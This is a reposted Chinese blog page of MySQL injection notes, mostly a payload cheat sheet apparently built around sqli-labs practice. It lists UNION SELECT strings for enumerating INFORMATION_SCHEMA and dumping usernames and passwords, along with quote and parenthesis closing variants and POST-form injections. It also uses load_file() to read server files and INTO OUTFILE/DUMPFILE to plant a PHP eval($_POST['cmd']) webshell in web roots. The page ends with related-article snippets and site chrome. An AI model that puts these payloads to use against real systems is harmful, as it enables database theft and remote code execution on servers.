Mysql注入笔记

最新推荐文章于 2021-04-01 10:09:00 发布
最新推荐文章于 2021-04-01 10:09:00 发布
阅读量115 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/seeker01/p/7988875.html
版权

1.基于字符型报错注入

报字段数:

' order by 3 --+    // “+” 代表空格

' union select 1,2,3 --+

' UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA --+  // 获取数据库信息

' UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479 --+  // 获取表信息

' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 0x7573657273 --+  // 获取表字段信息

' UNION SELECT 1,GROUP_CONCAT(username,0x3a,password,0x20),3 FROM security.users --+ // 获取数据o

2.基于数字型报错注入

不需要使用 ' 进行闭合,直接利用,利用方法和字符型一样

3.字符型报错注入(带())

') order by 3--+  // 使用 )进行闭合

4.字符型报错注入(带")

") order by 3--+  // 

5. 导入导出函数

读取函数:load_file()

union select load_file(“C://TEST.txt”);  或者  union select load_file(“C:/TEST.txt”);

导出函数:outfile()  dumpfile()

windows环境:

union select 1,2,'<?php eval($_POST["cmd"]) ?>' into outfile "C:\\phpstudy\\WWW\\test\\less7.php" %23

Linux环境:

union select 1,2,'<?php eval($_POST["cmd"]) ?>' into outfile "/var/www/web/cmd.php" %23

union select "<?php eval($_POST['cmd'])?>" dumpfile 'C:/phpstudy/WWW/test/webshell.php';

6.POST类型注入

uname=admin'#&passwd=chybeta&submit=Submit

uname=admin”#&passwd=chybeta&submit=Submit

转载于:https://www.cnblogs.com/seeker01/p/7988875.html

weixin_33825683
关注
MySQL注入笔记
m0_47599604的博客
03-09 155
目录 MySQL MySQL简介 MySQL基础结构 数据库连接 基础语法 内置库知识 MySQL相关函数 内联注释的特性 SQL注入实战 sqli_labs搭建 SQL注入简介 SQL注入漏洞的危害 SQL注入类型 类型详解 宽字节注入 MySQL MySQL简介 MySQL是最流行的关系型数据库管理系统,在WEB应用方面MySQL是最好的RDBMS(Relational Database Management System:关系型数据库管理系统)应用软.
MySQL 注入笔记
聂培志的博客
12-18 518
靶场环境:dvwa , 安全等级 low 判断存在SQL注入 提交'报错id=1 和 id =1 and 1=1 返回的结果一样,id=1 和 id =1 and 1=2 返回的结果不一样 构造正确的SQL语句 -- 数字型 id=1 or 1=1 select * from where id=1 or 1=1 --字符型 ' id=' or 2<>'1 select * from w...
Mysql注入学习笔记(一)
Radiation's Blog
10-17 372
0x01–前言一直以来MySql注入的基础掌握的都不是太好,所以在注入的时候总是会出现这样那样的问题,于是我就打算系统学习一下。有什么不对的地方欢迎大家指出,也欢迎大家给予补充。0x02–information_schema数据库简介information_schema数据库MySQL自带的,它提供了访问数据库元数据的方式。什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或
MySQL注入笔记(二)—MySQL注入常用函数
慢就是快
04-01 453
测试环境为MACOS,数据库版本为8.0.20
MySQL笔记(狂神说java)
09-25
"狂神说Java"的MySQL笔记可能深入探讨了如何在Java编程环境中与MySQL进行交互,这对于我们理解数据库管理和开发至关重要。以下是对这个主题的详细阐述: 1. **MySQL基础**: - 数据库概念:MySQL是一个用于存储和...
MySQL学习笔记.zip
最新发布
02-23
这份“MySQL学习笔记”将引导我们深入理解其核心概念和实用技能。 一、MySQL简介 MySQL是一个开源、免费的数据库系统,由瑞典的MySQL AB公司开发,后被Oracle公司收购。它的设计目标是速度、可移植性和简洁性,支持...
mysql高级笔记.zip
11-07
"mysql高级笔记.zip"压缩包文件很可能包含了一系列深入探讨MySQL高级特性和最佳实践的教程或文档。从`mysql_advanced-master`这个子文件名来看,我们可以预期这些内容可能组织成一个项目结构,涵盖了多个高级主题。 ...
Mysql注入.pdf
01-25
MySQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或转义用户输入,导致恶意SQL命令被执行。这种漏洞允许攻击者绕过权限控制、获取敏感信息、修改或删除数据,甚至完全控制数据库服务器。OWASP...
Redhat Linux笔记
01-09
Redhat Linux笔记 写文章不容易关注一下我呗 带你更新更多好玩的网络安全教程 我是FR13ENDS 下次不见不散我是FR13ENDS我们不见不散ps:我叫FR13ENDS因为改不了id所以只能这样了见谅吧 poweroff关机 init 0关机 reboot重启 init 3命令行模式 startx图形化界面 useradd 用户名添加新用户 passwd 密码给新用户添加密码 su – 用户名切换到普通用户 exit退出普通用户 rm 文件名删除单个文件 rm 文件夹名 -fr删除文件夹包括文件夹内的文件,不提示 cat 文本名显示文本 more 文本名以翻页形式显示文本 浏览目录
一篇Mysql注入最全详解(2)
u011277123的博客
05-26 2013
中国统计网 2017-05-23 22:05 一个数据库当中有很多的数据表,数据表当中有很多的列,每一列当中存储着数据。我们注入的过程就是先拿到数据库名,在获取到当前数据库名下的数据表,再获取当前数据表下的列,最后获取数据。 现在做一些mysql的基本操作。启动mysql,然后通过查询检查下数据库: show databases; 现在我们可以看到这里有四张表,然后我们
SQL注入笔记
shutdowndo的博客
03-20 183
SQL注入笔记写文章不容易关注一下我呗 带你更新更多好玩的网络安全教程 我是FR13ENDS 下次不见不散我是FR13ENDS我们不见不散ps:我叫FR13ENDS因为改不了id所以只能这样了见谅吧 kali命令开启apache:service apache2 start mysql命令: how databases;查看所有数据库 select database();查看当前所在数据库 ...
网站浏览状态码的那点事
shutdowndo的博客
04-03 361
网站浏览状态码的那点事开头水话进入正题从100~199开始bb从200~299开始bb从300~399开始bb从400~499开始bb从500~599开始bb完结撒花 开头水话 Hello 大家好我又双叒叕来了 今天废话不多说我现在开始进入正题 进入正题 当你们浏览网站的时候发没发现这种东西很让人头疼的那种 当你想尽力去看404,403的时候还一脸懵的样子,今天我来写一篇文章...
Mysql注入学习笔记
xj28555的博客
06-25 2243
MYSQL注入 函数 version()——MySQL 版本 user()——数据库用户名 database()——数据库名 @@datadir——数据库路径 @@version_compile_os——操作系统版本 information_schema 自带数据库 information_schema.schemata 数据库 information_schema.tables 数据表 information_schema.columns 数据列 floor函数返回小于等于该值的最大整数 RAND()
【安全牛学习笔记mysql注入总结
edu_aqniu的博客
10-31 784
mysql注入总结 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert、update) 0x02 mysql报错注入 0x03 mysql一般盲注 0x04 mysql时间盲注 0x05 mysql其他注入技巧 0x06 mysql数据库版本特性 0x07 声明 正文: 0x00 mys
mysql报错注入_Mysql报错注入笔记
weixin_28318011的博客
12-23 362
本文章由核心成员Luan原创,未经允许严禁转载。前天写了phpcms的一个注入exp,经过大量测试发现,很多网站明明存在漏洞,我的exp却失败了。多方面分析后,结果不是因为waf,而是因为mysql版本问题。我的exp是使用的报错注入,如果mysql版本过低,某些报错函数就用不了!详细见下文:1.MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()...
MySQL注入攻击技术详解
"MySQL注入笔记" MySQL注入是一种网络安全漏洞,攻击者通过在Web应用程序的输入框中插入SQL语句,利用程序未对用户输入进行有效过滤的缺陷,来操控数据库。以下是一些关于MySQL注入的关键知识点: 1. **注入检测**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值